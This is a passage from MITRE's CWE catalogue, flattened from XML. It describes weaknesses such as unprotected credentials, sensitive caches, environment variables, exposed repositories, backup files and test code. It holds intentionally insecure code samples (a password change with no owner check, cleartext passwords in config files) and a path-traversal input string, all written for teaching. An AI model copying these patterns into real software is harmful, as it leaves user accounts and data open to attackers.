Content Team + MITRE + 2012-05-11 + updated Common_Consequences, References, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Description, Modes_of_Introduction, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval. + + + + + + + + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + Implementation + + + + + Access Control + Gain Privileges or Assume Identity + An attacker could gain access to user accounts and access sensitive data used by the user accounts. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Use an appropriate security mechanism to protect the credentials. + + + Architecture and Design + Make appropriate use of cryptography to protect the credentials. + + + Implementation + Use industry standards to protect the credentials (e.g. LDAP, keystore, etc.). + + + + + This code changes a user's password. + + $user = $_GET['user'];$pass = $_GET['pass'];$checkpass = $_GET['checkpass'];if ($pass == $checkpass) {SetUserPassword($user, $pass);} + + While the code confirms that the requesting user typed the same new password twice, it does not confirm that the user requesting the password change is the same user whose password will be changed. An attacker can request a change of another user's password and gain control of the victim's account. + + + The following code reads a password from a properties file and uses the password to connect to a database. + + ...Properties prop = new Properties();prop.load(new FileInputStream("config.properties"));String password = prop.getProperty("password");DriverManager.getConnection(url, usr, password);... + + This code will run successfully, but anyone who has access to config.properties can read the value of password. If a devious employee has access to this information, they can use it to break into the system. + + + The following code reads a password from the registry and uses the password to create a new network credential. + + ...String password = regKey.GetValue(passKey).toString();NetworkCredential netCred = new NetworkCredential(username,password,domain);... + + This code will run successfully, but anyone who has access to the registry key used to store the password can read the value of password. If a devious employee has access to this information, they can use it to break into the system + + + Both of these examples verify a password by comparing it to a stored compressed version. + + int VerifyAdmin(char *password) {if (strcmp(compress(password), compressed_password)) {printf("Incorrect Password!\n");return(0);}printf("Entering Diagnostic Mode...\n");return(1);} + + + int VerifyAdmin(String password) {if (passwd.Equals(compress(password), compressed_password)) {return(0);} + //Diagnostic Mode + return(1);} + + Because a compression algorithm is used instead of a one way hashing algorithm, an attacker can recover compressed passwords stored in the database. + + + The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext. + This Java example shows a properties file with a cleartext username / password pair. + + + + # Java Web App ResourceBundle properties file + ...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword... + + The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext. + + ...<connectionStrings><add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" /></connectionStrings>... + + Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information. + + + In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. + Multiple vendors used cleartext transmission or storage of passwords in their OT products. + + + + + CVE-2022-29959 + Initialization file contains credentials that can be decoded using a "simple string transformation" + https://www.cve.org/CVERecord?id=CVE-2022-29959 + + + CVE-2022-35411 + Python-based RPC framework enables pickle functionality by default, allowing clients to unpickle untrusted data. + https://www.cve.org/CVERecord?id=CVE-2022-35411 + + + CVE-2022-29519 + Programmable Logic Controller (PLC) sends sensitive information in plaintext, including passwords and session tokens. + https://www.cve.org/CVERecord?id=CVE-2022-29519 + + + CVE-2022-30312 + Building Controller uses a protocol that transmits authentication credentials in plaintext. + https://www.cve.org/CVERecord?id=CVE-2022-30312 + + + CVE-2022-31204 + Programmable Logic Controller (PLC) sends password in plaintext. + https://www.cve.org/CVERecord?id=CVE-2022-31204 + + + CVE-2022-30275 + Remote Terminal Unit (RTU) uses a driver that relies on a password stored in plaintext. + https://www.cve.org/CVERecord?id=CVE-2022-30275 + + + CVE-2007-0681 + Web app allows remote attackers to change the passwords of arbitrary users without providing the original password, and possibly perform other unauthorized actions. + https://www.cve.org/CVERecord?id=CVE-2007-0681 + + + CVE-2000-0944 + Web application password change utility doesn't check the original password. + https://www.cve.org/CVERecord?id=CVE-2000-0944 + + + CVE-2005-3435 + product authentication succeeds if user-provided MD5 hash matches the hash in its database; this can be subjected to replay attacks. + https://www.cve.org/CVERecord?id=CVE-2005-3435 + + + CVE-2005-0408 + chain: product generates predictable MD5 hashes using a constant value combined with username, allowing authentication bypass. + https://www.cve.org/CVERecord?id=CVE-2005-0408 + + + + + A7 + Broken Authentication and Session Management + CWE More Specific + + + A3 + Broken Authentication and Session Management + CWE More Specific + + + + + + + + + + + + + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Other_Notes, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Modes_of_Introduction, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships, Type + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-07-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples, Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Login pages do not use adequate measures to protect the user name and password while they are in transit from the client to the server. + + + + + + SSL (Secure Socket Layer) provides data confidentiality and integrity to HTTP. By encrypting HTTP messages, SSL protects from attackers eavesdropping or altering message contents. + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + + + Access Control + Gain Privileges or Assume Identity + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Operation + System Configuration + Enforce SSL use for the login page or any page used to transmit user credentials or other sensitive information. Even if the entire site does not use SSL, it MUST use SSL for login. Additionally, to help prevent phishing attacks, make sure that SSL serves the login page. SSL allows the user to verify the identity of the server to which they are connecting. If the SSL serves login page, the user can be certain they are talking to the proper end system. A phishing attack would typically redirect a user to a site that does not have a valid trusted server certificate issued from an authorized supplier. + + + + + SFP23 + Exposed Data + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Background_Details, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Other_Notes, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships, Type + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The code uses a cache that contains sensitive information, but the cache can be read by an actor outside of the intended control sphere. + + Applications may use caches to improve efficiency when communicating with remote entities or performing intensive calculations. A cache maintains a pool of objects, threads, connections, pages, financial data, passwords, or other resources to minimize the time it takes to initialize and access these resources. If the cache is accessible to unauthorized actors, attackers can read the cache and obtain this sensitive information. + + + + + + + Implementation + + + + + Confidentiality + Read Application Data + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Protect information stored in cache. + + + Architecture and Design + Do not store unnecessarily sensitive information in the cache. + + + Architecture and Design + Consider using encryption in the cache. + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-03-29 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationships, Type + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Information Leak Through Caching + Information Exposure Through Caching + + + + The web application does not use an appropriate caching policy that specifies the extent to which each web page and associated form fields should be cached. + + + + + + Implementation + + + + + Confidentiality + Read Application Data + Browsers often store information in a client-side cache, which can leave behind sensitive information for other users to find and exploit, such as passwords or credit card numbers. The locations at most risk include public terminals, such as those in libraries and Internet cafes. + + + + + Architecture and Design + Protect information stored in cache. + + + Architecture and Design + Implementation + Use a restrictive caching policy for forms and web pages that potentially contain sensitive information. + + + Architecture and Design + Do not store unnecessarily sensitive information in the cache. + + + Architecture and Design + Consider using encryption in the cache. + + + + + A2 + Broken Access Control + CWE More Specific + + + A3 + Broken Authentication and Session Management + CWE More Specific + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Information Leak Through Browser Caching + Information Exposure Through Browser Caching + + + + The product uses an environment variable to store unencrypted sensitive information. + Information stored in an environment variable can be accessible by other processes with the execution context, including child processes that dependencies are executed in, or serverless functions in cloud environments. An environment variable's contents can also be inserted into messages, headers, log files, or other outputs. Often these other dependencies have no need to use the environment variable in question. A weakness that discloses environment variables could expose this information. + + + + + + + Architecture and Design + + + Implementation + + + Operation + + + + + Confidentiality + Read Application Data + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Encrypt information stored in the environment variable to protect it from being exposed to an unauthorized user. If encryption is not feasible or is considered too expensive for the business use of the application, then consider using a properly protected configuration file instead of an environment variable. It should be understood that unencrypted information in a config file is also not guaranteed to be protected, but it is still a better choice, because it reduces attack surface related to weaknesses such as CWE-214. In some settings, vaults might be a feasible option for safer data transfer. Users should be notified of the business choice made to not protect the sensitive information through encryption. + + + Implementation + If the environment variable is not necessary for the desired behavior, then remove it entirely, or clear it to an empty value. + + + + + CVE-2022-43691 + CMS shows sensitive server-side information from environment variables when run in Debug mode. + https://www.cve.org/CVERecord?id=CVE-2022-43691 + + + CVE-2022-27195 + Plugin for an automation server inserts environment variable contents into build XML files. + https://www.cve.org/CVERecord?id=CVE-2022-27195 + + + CVE-2022-25264 + CI/CD tool logs environment variables related to passwords add Contribution to content history. + https://www.cve.org/CVERecord?id=CVE-2022-25264 + + + + + SFP23 + Exposed Data + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Name, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Name, Observed_Examples, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Drew Buttner + MITRE + 2023-01-11 + Suggested improvements to name, description, relationships, and mitigations + + Information Leak Through Environmental Variables + Information Exposure Through Environmental Variables + Exposure of Sensitive Information Through Environmental Variables + + + + The product stores a CVS, git, or other repository in a directory, archive, or other resource that is stored, transferred, or otherwise made accessible to unauthorized actors. + Version control repositories such as CVS or git store version-specific metadata and other details within subdirectories. If these subdirectories are stored on a web server or added to an archive, then these could be used by an attacker. This information may include usernames, filenames, path root, IP addresses, and detailed "diff" data about how files have been changed - which could reveal source code snippets that were never intended to be made public. + + + + + + Operation + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + + + Confidentiality + Read Application Data + Read Files or Directories + + + + + Operation + Distribution + System Configuration + Recommendations include removing any CVS directories and repositories from the production server, disabling the use of remote CVS repositories, and ensuring that the latest CVS patches and version updates have been performed. + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-12-28 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Information Leak Through CVS Repository + Exposure of CVS Repository to an Unauthorized Control Sphere + + + + The product generates a core dump file in a directory, archive, or other resource that is stored, transferred, or otherwise made accessible to unauthorized actors. + + + + + + Operation + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + + + Confidentiality + Read Application Data + Read Files or Directories + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + System Configuration + Protect the core dump files from unauthorized access. + + + + + MEM06-C + Ensure that sensitive data is not written out to disk + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-12-28 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships, Taxonomy_Mappings, Time_of_Introduction + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Information Leak Through Core Dump Files + + + + The product stores access control list files in a directory or other container that is accessible to actors outside of the intended control sphere. + Exposure of these access control list files may give the attacker information about the configuration of the site or system. This information may then be used to bypass the intended security policy or identify trusted systems from which an attack can be launched. + + + + + + Operation + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + + + Confidentiality + Access Control + Read Application Data + Bypass Protection Mechanism + + + + + System Configuration + Protect access control list files. + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-12-28 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Information Leak Through Access Control List Files + + + + The product accepts path input in the form of multiple internal backslash ('\multiple\trailing\\slash') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + \multiple\\internal\backslash + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Multiple Internal Backslash - \multiple\\internal\backslash + + + + A backup file is stored in a directory or archive that is made accessible to unauthorized actors. + Often, older backup files are renamed with an extension such as .~bk to distinguish them from production files. The source code for old files that have been renamed in this manner and left in the webroot can often be retrieved. This renaming may have been performed automatically by the web server, or manually by the administrator. + + + + + + Operation + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + + + Confidentiality + Read Application Data + At a minimum, an attacker who retrieves this file would have all the information contained in it, whether that be database calls, the format of parameters accepted by the application, or simply information regarding the architectural structure of your site. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Policy + Recommendations include implementing a security policy within your organization that prohibits backing up web application source code in the webroot. + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences + + + CWE Content Team + MITRE + 2009-12-28 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships, Taxonomy_Mappings, Time_of_Introduction + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Information Leak Through Backup (.~bk) Files + + + + Accessible test applications can pose a variety of security risks. Since developers or administrators rarely consider that someone besides themselves would even know about the existence of these applications, it is common for them to contain sensitive information or functions. + + + + + + Testing + + + + + Confidentiality + Read Application Data + + + + + Distribution + Installation + Remove test code before deploying the application into production. + + + + + Examples of common issues with test applications include administrative functions, listings of usernames, passwords or session identifiers and information about the system, server or application configuration. + + + + + SFP28 + Unexpected access points + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Name, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Information Leak Through Test Code + Information Exposure Through Test Code + + + + Information written to log files can be of a sensitive nature and give valuable guidance to an attacker or expose sensitive user information. + + While logging all information may be helpful during development stages, it is important that logging levels be set appropriately before a product ships so that sensitive user data and system information are not accidentally exposed to potential attackers. + Different log files may be produced and stored for: + + Server log files 